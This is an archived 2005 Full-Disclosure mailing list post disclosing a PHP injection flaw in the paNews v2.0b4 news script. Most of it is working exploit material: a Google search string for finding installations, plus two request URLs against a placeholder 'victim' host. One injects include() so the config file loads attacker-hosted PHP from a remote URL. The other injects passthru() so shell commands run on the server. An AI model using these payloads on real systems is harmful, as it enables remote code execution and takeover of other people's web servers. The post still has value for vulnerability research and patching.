| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: tjomka at navigator.lv (tjomka) Subject: paNews v2.0b4 - PHP Injection oooo oooo oooooooo8 ooooooooooo 8888o 88 888 88 888 88 88 888o88 888oooooo 888 88 8888 888 888 o88o 88 o88oooo888 o888o ******************************** **** Network security team ***** ********* nst.e-nex.com ******** ******************************** * Title: paNews v2.0b4 * Bug found by: nst * Date: 20.02.2005 ******************************** web: http://www.phparena.net/panews.php google: allintitle:paNews v2.0b4 PHP Injection Bug works only if: 1. register_globals=On 2. folder "includes" is writable p.s. please disable - javascripts =-] Example 1 http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst) then: http://victim/panews/includes/config.php?nst=http://your/file.php Example 2 http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst) then: http://victim/panews/includes/config.php?nst=id -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: paNews_v2.0b4.txt Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20050221/ed7e8b42/paNews_v2.0b4.txt
Powered by blists - more mailing lists